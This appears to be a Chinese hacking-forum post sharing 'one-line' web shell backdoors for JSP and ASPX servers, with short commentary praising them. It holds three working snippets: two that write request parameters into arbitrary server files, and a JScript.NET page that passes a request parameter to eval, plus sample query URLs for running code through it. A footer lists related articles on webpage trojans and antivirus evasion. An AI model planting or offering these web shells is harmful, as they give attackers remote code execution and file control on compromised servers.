| 以下是引用片段: <% if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("\\")+request.getParameter("f"))).write(request.getParameter("t").getBytes()); %> |
| 以下是引用片段: <%@ Page Language="C#" validateRequest="false" %><%System.IO.StreamWriter ow=new System.IO.StreamWriter(Server.MapPath("images.aspx"),false);ow.Write(Request.Params ["l"]);ow.Close()%> |
这个不知道是谁的作品,感觉性质有点像我的JSP一句话了!不过还是把简单的shell实现了!支持 ing....
两个一句话大体都一样 调用类把 接收的都写到文件!简单说就是对文件写操作而已!~昔日ASP一句话的光辉如今在中间语言的后门中给限制得荡然无存~~错!......ASPX C/S木马我们一样可以实现!因为有Jscript.net的存在!上面所说到的eval函数还生存着!~
OK我们先来实现
| 以下是引用片段: <%@ Page Language="Jscript"%><%Response.Write(eval(Request.Item["nonamed"]));%> |
| 以下是引用片段: http://127.0.0.1/text.aspx?nonamed=var%20mydate%20=%20new%20Date(); |
| 以下是引用片段: http://127.0.0.1/text.aspx?nonamed=Server.MapPath("."); |
发现报告错误了!....(我就是因为卡在这里,所以折腾了几个月,不然这文章早出炉了!在这里感谢一下 闇の術士 QQ:4659675 欢迎大家找他学习 ...哈)
| 分析ANI智能网马挂马 | 06-08 | |
| XML木马研究 | 05-18 | |
| 脚本图片类后门病毒的完美使用方 | 05-16 | |
| 两个批量挂马脚本 | 05-11 | |
| 黑客技术之打造不死的ASP木马的方 | 04-20 | |
| 2007年IE 0day 网马 | 04-02 | |
| 修改特征码打造免杀后门之灰鸽子 | 04-02 | |
| 挂马代码大全 | 03-22 | |
| 打造不死的asp木马 | 03-21 | |
| 一段可自动点击运行的代码 | 03-19 | |
| 最新.aspx微型后门代码 | 03-19 | |
| 木马免杀原理详解 | 01-31 | |